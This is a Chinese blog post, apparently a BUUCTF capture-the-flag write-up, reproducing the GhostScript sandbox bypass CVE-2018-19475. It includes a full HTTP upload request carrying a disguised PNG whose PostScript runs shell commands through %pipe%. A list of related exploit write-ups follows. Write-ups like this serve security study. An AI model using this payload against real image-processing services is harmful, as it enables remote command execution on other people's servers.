Buuctf [GhostScript]CVE-2018-19475

最新推荐文章于 2024-08-09 09:30:13 发布
最新推荐文章于 2024-08-09 09:30:13 发布
阅读量158 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ch258563/article/details/130950874
版权

漏洞描述

8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞

GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。

./psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限管理等安全措施。

漏洞影响
Ghostscript 9.26之前版本

漏洞复现

上传一个图片

执行命令id > /tmp/success && cat /tmp/success

poc

POST / HTTP/1.1
Host: node4.buuoj.cn:26462
Content-Length: 298
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node4.buuoj.cn:26462
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfHmUI12CQfQstekf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://node4.buuoj.cn:26462/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryfHmUI12CQfQstekf
Content-Disposition: form-data; name="file_upload"; filename="333.png"
Content-Type: image/png

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file

------WebKitFormBoundaryfHmUI12CQfQstekf--

 打印环境变量,获得flag

 

 

 

土豆儿258563
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475
qq_51577576的博客
12-17 712
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475 CVE-2018-19475CVE-2018-16509的变体,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。
buuctf [GhostScript]CVE-2018-19475
qq_1873822的博客
03-30 435
漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 ./psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475
EC_Carrot的博客
06-06 558
漏洞背景 Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript(一种用于电子产业和桌面出版领域的页面描述语言和编程语言)解析器。该产品可显示Postscript文件以及在非Postscript打印机上打印Postscript文件。 Artifex Software Ghostscript 9.26之前版本中的psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限管理等安全措施
GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-19475 漏洞复现
ADummy的博客
02-24 512
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475) by ADummy 0x00利用路线 ​ 构造poc png图片—>上传图片—>有回显命令执行 0x01漏洞介绍 ​ 2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。 0x02漏洞复现 将P
php沙盒绕过,GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475
weixin_30317869的博客
03-21 229
POST /index.php HTTP/1.1Host: targetAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: close...
ghostscript-9.26-bin
10-12
标题中的"ghostscript-9.26-bin"指的是Ghostscript的9.26版本的二进制发行版,这个版本包含了可执行文件和其他必要的动态链接库(.so文件),使得用户能够在不同的平台上运行和处理PostScript和PDF文件。 ...
ghostscript-9.02.tar.gz
09-03
ghostscript-9.02,用于linux中pdf转图片工具
Ghostscript fonts-开源
05-01
字体和字体指标通常随Ghostscript一起分发。 当前包括35种标准PostScript字体和其他字体。
ghostscript-9.27-linux-x86_64.tgz
06-19
Python 读取PDF图片所需资源,ghostscript-9.27-linux-x86_64.tgz
ghostscript-9.27-1.el8.x86_64.rpm
12-06
离线安装包,亲测可用
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)复现
HEAVEN569的博客
06-21 562
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)复现
复现vulhub中ghostscriptCVE-2018-19475漏洞
YX_zjp的博客
03-07 763
2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。5、上传poc.png,点击“提交查询”,执行命令id > /tmp/success && cat /tmp/success。GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)系统:ubuntu20.04。
Buuctf GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)
ch258563的博客
05-30 540
Buuctf GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)
vulhub漏洞复现十七_GhostScript
weixin_44193247的博客
01-28 933
vulhub漏洞复现练习篇
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
黑白的博客
12-22 1266
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
GhostScript 沙箱绕过(命令执行)CVE-2018-16509/6116/19475/ 漏洞
weixin_51387754的博客
11-24 1009
标题 browse——ghost.png 提交 submit Query
Gitlab 任意文件读取漏洞(CVE-2016-9086)和漏洞(CVE-2018-19475
m0_53603468的博客
12-25 786
文章目录一、概述**任意文件读取漏洞**二、漏洞复现 一、概述 Gitlab 任意文件读取漏洞(CVE-2016-9086) 影响版本Gitlab版本:8.13.1之前 GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。使用Git作为代码管理工具,并在此基础上搭建起来的web服务。 GitLab由乌克兰程序员DmitriyZaporozhets和ValerySizov开发,它使用Ruby语言写成。后来,一些部分用Go语言重写。截止
cve-2018-2894简析
一个安全研究员
05-27 2251
如题
深入探讨安全验证:OAuth2.0、Cookie与Session、JWT令牌、SSO与开放授权平台设计
最新发布
努力的小雨,一个阳光向上的博客不仅仅给你知识更希望带给你快乐
08-09 949
CSRF(Cross-Site Request Forgery)攻击是一种利用受害者在已经认证的状态下执行非意愿操作的攻击方式。攻击者通过诱使受害者访问恶意网站或点击恶意链接,来执行未经授权的操作,例如修改密码、进行转账等,简单来说就是,由于cookie是在浏览器共享的,所以一旦设置了cookie,那么当你打开另一个tab页的时候,也会携带过去,那么其他站点就可以使用cookie进行攻击,具体如下:比如:当你在浏览器中打开银行A的网页并成功登录后,你想要进行转账操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值